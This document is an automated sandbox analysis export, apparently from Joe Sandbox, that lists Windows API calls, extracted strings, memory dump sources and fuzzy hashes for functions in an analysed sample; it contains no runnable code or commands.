                                                                                                                                                                                                                                                                          • Instruction ID: 2354bcaca802c30272a6100808007ec7b35e039ff229d52442ae4c5be07b86d0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc9ab35d6ae9b4f3952787e08e121b59cd4d8cc6228a1598c4f52f68d88c2d2c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B218475A44355ABEB10CF95CC49B6EBBF8FB05711F01011AFA15E72C0EB7599008BA1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0045B428,DF534560,00000000,?,?,?,?,?,?,001C3750,0037454D,000000FF), ref: 001C3F2D
                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(0045B428), ref: 001C40A3
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                          • String ID: v$&^4$0$0^4$AtlAxWin140$AtlAxWinLic140$WM_ATLGETCONTROL$WM_ATLGETHOST
                                                                                                                                                                                                                                                                          • API String ID: 3168844106-3319681165
                                                                                                                                                                                                                                                                          • Opcode ID: d4055b18e1eeed70aeca59eb52965e264de324da259d6225245a16c2726f8b07
                                                                                                                                                                                                                                                                          • Instruction ID: 11fdcb05dc6b54a553facb82bdfe6123ef8aed3f5d0c47deb0301da16dbebb67
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4055b18e1eeed70aeca59eb52965e264de324da259d6225245a16c2726f8b07
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D5138B1C04319DFCB11CFA4E845BEEBBB8EB09705F10412AE814B7381D7B99A05CBA5
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: __aulldiv
                                                                                                                                                                                                                                                                          • String ID: :$f$f$f$p$p$p
                                                                                                                                                                                                                                                                          • API String ID: 3732870572-1434680307
                                                                                                                                                                                                                                                                          • Opcode ID: 013564e479b2db0c71377780a6d618be377321a5e9063e1932ec4065dafd7c67
                                                                                                                                                                                                                                                                          • Instruction ID: e9b097205381da69287dcedc6a47934b3d69b47bd1bf8d736846473b1fd702c0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 013564e479b2db0c71377780a6d618be377321a5e9063e1932ec4065dafd7c67
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F02A1B59102189BDF3A8F65D444EEDB776FB41B0EFA68505E8157B2A0E3308ECD8B14
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,?,?,00000000), ref: 6A5692D6
                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,00000000), ref: 6A5692DD
                                                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,0000000C,?,00000000), ref: 6A5692F1
                                                                                                                                                                                                                                                                          • SetConsoleTextAttribute.KERNEL32(00000000,?,00000000), ref: 6A5692F8
                                                                                                                                                                                                                                                                            • Part of subcall function 6A56CF5B: EnterCriticalSection.KERNEL32(6A5D6A2C,?,?,?,6A547EBD,6A5D7224,AA831995,?,00000000,6A58C51D,000000FF,?,6A5659D2), ref: 6A56CF66
                                                                                                                                                                                                                                                                            • Part of subcall function 6A56CF5B: LeaveCriticalSection.KERNEL32(6A5D6A2C,?,6A547EBD,6A5D7224,AA831995,?,00000000,6A58C51D,000000FF,?,6A5659D2), ref: 6A56CFA3
                                                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,?,?,00000000,00000000,00000000,6A5B6F74,00000002,?,00000000), ref: 6A569387
                                                                                                                                                                                                                                                                          • SetConsoleTextAttribute.KERNEL32(00000000,?,00000000), ref: 6A56938E
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ConsoleHandle$AttributeCriticalSectionText$BufferEnterInfoLeaveScreen
                                                                                                                                                                                                                                                                          • String ID: Error
                                                                                                                                                                                                                                                                          • API String ID: 3234038037-2619118453
                                                                                                                                                                                                                                                                          • Opcode ID: 2a83db49a31fcda4e49718865f820591ca36ddbcc7d25c27181ca33ff1c30225
                                                                                                                                                                                                                                                                          • Instruction ID: 054779fa4a0dd0393a84098b2ffd72a747d2b9b7658db00ee39f51e2a8182496
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a83db49a31fcda4e49718865f820591ca36ddbcc7d25c27181ca33ff1c30225
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F123870E00358DFDF10CFA4C848B9EBBB5BF46318F118699E459AB290DB759A84CF51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • lstrcmpW.KERNEL32(?,#32770), ref: 001C6181
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: lstrcmp
                                                                                                                                                                                                                                                                          • String ID: #32770$Ad4$D^4$b^4
                                                                                                                                                                                                                                                                          • API String ID: 1534048567-993881407
                                                                                                                                                                                                                                                                          • Opcode ID: 73e8e55625ca3f324978a46919301c699e284b0a6c15c0f938b500078acbbfe0
                                                                                                                                                                                                                                                                          • Instruction ID: 51cdcd592046e888349aef9052673fd02bdde49ee4f6e18b32eaad69cec24889
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73e8e55625ca3f324978a46919301c699e284b0a6c15c0f938b500078acbbfe0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1AE19A71A00219EFDB15CFA4C848FADBBB5BF69710F14812CE805AB2A1DB34ED44CB61
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 6A570D65
                                                                                                                                                                                                                                                                          • ___TypeMatch.LIBVCRUNTIME ref: 6A570E73
                                                                                                                                                                                                                                                                          • CatchIt.LIBVCRUNTIME ref: 6A570EC4
                                                                                                                                                                                                                                                                          • _UnwindNestedFrames.LIBCMT ref: 6A570FC5
                                                                                                                                                                                                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 6A570FE0
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                          • API String ID: 4119006552-393685449
                                                                                                                                                                                                                                                                          • Opcode ID: 9cbac41cf617377df8f275ba5bae88c93728f98aff578a12d92e779f25e29843
                                                                                                                                                                                                                                                                          • Instruction ID: cfc24a477a49b74f27e4b837f5758dad00b9e8a8cab3eaa15c654afd17182885
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9cbac41cf617377df8f275ba5bae88c93728f98aff578a12d92e779f25e29843
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7FB17A71C00209EFCF26DFA4D88499EBBB6FF45314F16415AE8147B212DB32EA91CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,DF534560), ref: 002B9919
                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00001000,?,00000000,00001000), ref: 002B9989
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 002B9B8E
                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,00001000,00000000,00000000,?,00000000,00000000), ref: 002B9C15
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$Read$CloseCreateHandle
                                                                                                                                                                                                                                                                          • String ID: t=
                                                                                                                                                                                                                                                                          • API String ID: 1724936099-4144653439
                                                                                                                                                                                                                                                                          • Opcode ID: b11608e1c0aee09cca7eb4b53aa52c70cdc5eb56c794c2ef7bb5ef7e98faa93e
                                                                                                                                                                                                                                                                          • Instruction ID: a14ee2e71eb6342d80362a171918fc51e572a6127d3e850f7d2ce078010e4eaa
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b11608e1c0aee09cca7eb4b53aa52c70cdc5eb56c794c2ef7bb5ef7e98faa93e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00C1AE71D10308DBDB20CFA4C845BEEBBB8AF59744F24825DE515BB281D7B0AE45CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?), ref: 0029E999
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0029E9C0
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: GetProcessHeap.KERNEL32 ref: 001B9E75
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9EA7
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9F32
                                                                                                                                                                                                                                                                            • Part of subcall function 001E86B0: FindResourceW.KERNEL32(00000000,00000100,00000006,00000000,000000FF,?,00000000,002A0619,000000FF), ref: 001E86ED
                                                                                                                                                                                                                                                                            • Part of subcall function 001E86B0: WideCharToMultiByte.KERNEL32(00000003,00000000,00000002,00000000,00000000,00000000,00000000,00000000,000000FF), ref: 001E871E
                                                                                                                                                                                                                                                                            • Part of subcall function 001E86B0: WideCharToMultiByte.KERNEL32(00000003,00000000,00000002,?,000000FF,00000000,00000000,00000000), ref: 001E8755
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?), ref: 0029EA35
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0029EA87
                                                                                                                                                                                                                                                                            • Part of subcall function 001E8790: WideCharToMultiByte.KERNEL32(00000003,00000000,002CBBCA,000000FF,00000000,00000000,00000000,00000000,?,?,?,002CBBCA,?,?), ref: 001E87AC
                                                                                                                                                                                                                                                                            • Part of subcall function 001E8790: WideCharToMultiByte.KERNEL32(00000003,00000000,002CBBCA,000000FF,?,-00000001,00000000,00000000,?,?,?,002CBBCA,?,?), ref: 001E87E2
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$CloseFileHandleInit_thread_footer$CreateFindHeapProcessResourceWrite
                                                                                                                                                                                                                                                                          • String ID: .bat$EXE$open$t=
                                                                                                                                                                                                                                                                          • API String ID: 4275363648-1099801128
                                                                                                                                                                                                                                                                          • Opcode ID: d08c65242a00e240df5f9745634d9fde6f25f11f0de666cd64fc6e08dcc0df65
                                                                                                                                                                                                                                                                          • Instruction ID: 810b6ae584f7afebfdad6a3add7bde7f606a35f4d9c90efd98397fb0145d9bb2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d08c65242a00e240df5f9745634d9fde6f25f11f0de666cd64fc6e08dcc0df65
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BCA16970901649EFEB11CFA8C948B9DFBF4FF49314F248299E415AB2A2DB749905CF90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 6A56CF5B: EnterCriticalSection.KERNEL32(6A5D6A2C,?,?,?,6A547EBD,6A5D7224,AA831995,?,00000000,6A58C51D,000000FF,?,6A5659D2), ref: 6A56CF66
                                                                                                                                                                                                                                                                            • Part of subcall function 6A56CF5B: LeaveCriticalSection.KERNEL32(6A5D6A2C,?,6A547EBD,6A5D7224,AA831995,?,00000000,6A58C51D,000000FF,?,6A5659D2), ref: 6A56CFA3
                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr,?,AA831995,?,00000000,?,?,?,AA831995), ref: 6A5683E2
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6A5683E9
                                                                                                                                                                                                                                                                            • Part of subcall function 6A56CF11: EnterCriticalSection.KERNEL32(6A5D6A2C,?,?,6A547F2E,6A5D7224,6A59F850), ref: 6A56CF1B
                                                                                                                                                                                                                                                                            • Part of subcall function 6A56CF11: LeaveCriticalSection.KERNEL32(6A5D6A2C,?,6A547F2E,6A5D7224,6A59F850), ref: 6A56CF4E
                                                                                                                                                                                                                                                                            • Part of subcall function 6A56CF11: RtlWakeAllConditionVariable.NTDLL ref: 6A56CFC5
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$AddressConditionLibraryLoadProcVariableWake
                                                                                                                                                                                                                                                                          • String ID: -> $%hs()$-----$Dbghelp.dll$SymFromAddr$[0x%.8Ix]
                                                                                                                                                                                                                                                                          • API String ID: 3620240239-2116945222
                                                                                                                                                                                                                                                                          • Opcode ID: 2a50b3a813da7fc421bfdf60155d7cbf2f6ddb5a9bf3f37e73f8f30c425a7c63
                                                                                                                                                                                                                                                                          • Instruction ID: 40a51e0c1f94b1854e68886f59744613f60e3afeb7cfec1919b3f8e7cce79a47
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a50b3a813da7fc421bfdf60155d7cbf2f6ddb5a9bf3f37e73f8f30c425a7c63
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75814EB0900249DFDB25CF68C854BDE7BF4FF59308F01492EE915A7291EB74AA14CBA1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 001CB5FF
                                                                                                                                                                                                                                                                            • Part of subcall function 003497F8: EnterCriticalSection.KERNEL32(00459EA0,?,?,001B9F37,0045AAD4,003CA720), ref: 00349802
                                                                                                                                                                                                                                                                            • Part of subcall function 003497F8: LeaveCriticalSection.KERNEL32(00459EA0,?,001B9F37,0045AAD4,003CA720), ref: 00349835
                                                                                                                                                                                                                                                                            • Part of subcall function 003497F8: RtlWakeAllConditionVariable.NTDLL ref: 003498AC
                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000,?), ref: 001CB653
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 001CB6B0
                                                                                                                                                                                                                                                                            • Part of subcall function 00349842: EnterCriticalSection.KERNEL32(00459EA0,-00000010,?,?,001B9EC6,0045AAD4,DF534560,?,?,0037191D,000000FF,?,001BCB1F,DF534560,-00000010,?), ref: 0034984D
                                                                                                                                                                                                                                                                            • Part of subcall function 00349842: LeaveCriticalSection.KERNEL32(00459EA0,?,001B9EC6,0045AAD4,DF534560,?,?,0037191D,000000FF,?,001BCB1F,DF534560,-00000010,?,?,00000008), ref: 0034988A
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,00000000,?), ref: 001CB714
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?), ref: 001CB73A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$CloseEnterFileHandleLeave$ConditionCreateInit_thread_footerVariableWakeWrite
                                                                                                                                                                                                                                                                          • String ID: aix$html$t=
                                                                                                                                                                                                                                                                          • API String ID: 2030708724-2560515477
                                                                                                                                                                                                                                                                          • Opcode ID: 6ef35ae973ae7eb5685b85e4bda0ea06a7632afca36bd16abad0e5176452ca53
                                                                                                                                                                                                                                                                          • Instruction ID: dc0c5d6e5ec7426311c6a09250fd01acae9ddf0f2d7cbb3a2e329b24a2729d79
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ef35ae973ae7eb5685b85e4bda0ea06a7632afca36bd16abad0e5176452ca53
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30618B71900348DBDB21CF94DD99BAEBBF4EB15709F10412DE401AB3D2DBB9A908CB95
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetSystemDefaultLangID.KERNEL32 ref: 002DB7FC
                                                                                                                                                                                                                                                                          • GetUserDefaultLangID.KERNEL32 ref: 002DB809
                                                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(kernel32.dll), ref: 002DB81B
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemDefaultUILanguage), ref: 002DB82F
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 002DB844
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AddressDefaultLangProc$LibraryLoadSystemUser
                                                                                                                                                                                                                                                                          • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll
                                                                                                                                                                                                                                                                          • API String ID: 667524283-3528650308
                                                                                                                                                                                                                                                                          • Opcode ID: ad894f043658c9da9d040c04e807821c8937e8b2a7a016f0074f8c1e452d61c3
                                                                                                                                                                                                                                                                          • Instruction ID: 7f11a374ab97f38a59e4ee4130bcc0063ab3bd9289227fbd90e67628e2547c9b
